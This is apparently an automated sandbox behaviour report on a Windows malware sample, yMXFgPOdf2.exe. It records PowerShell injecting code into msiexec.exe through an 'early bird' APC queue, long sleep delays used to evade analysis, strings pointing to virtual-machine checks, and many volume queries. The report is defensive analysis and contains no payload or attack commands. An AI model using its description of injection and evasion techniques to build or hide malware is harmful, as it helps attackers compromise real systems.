Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6504			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3103			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5160	Thread sleep time: -6456360425798339s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7540	Thread sleep time: -280000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Code function: 0_2_00405629 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405629
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Code function: 0_2_004060E4 FindFirstFileW,FindClose,	0_2_004060E4
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Code function: 0_2_0040276E FindFirstFileW,	0_2_0040276E

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: powershell.exe, 00000002.00000002.1828484729.00000000056DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter@\_q
Source: powershell.exe, 00000002.00000002.1828484729.00000000056DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter@\_q
Source: powershell.exe, 00000002.00000002.1828484729.00000000056DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.1828484729.00000000056DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter@\_q
Source: powershell.exe, 00000002.00000002.1828484729.00000000056DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000007.00000002.2605447393.000000000885A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2605447393.00000000088B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.1828484729.00000000056DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	API call chain: ExitProcess graph end node			graph_0-2951
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	API call chain: ExitProcess graph end node			graph_0-3092

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 2_2_04EA77F9 LdrInitializeThunk,

2_2_04EA77F9

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe

Code function: 0_2_0040610B GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_0040610B

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Early bird code injection technique detected

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3A60000

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
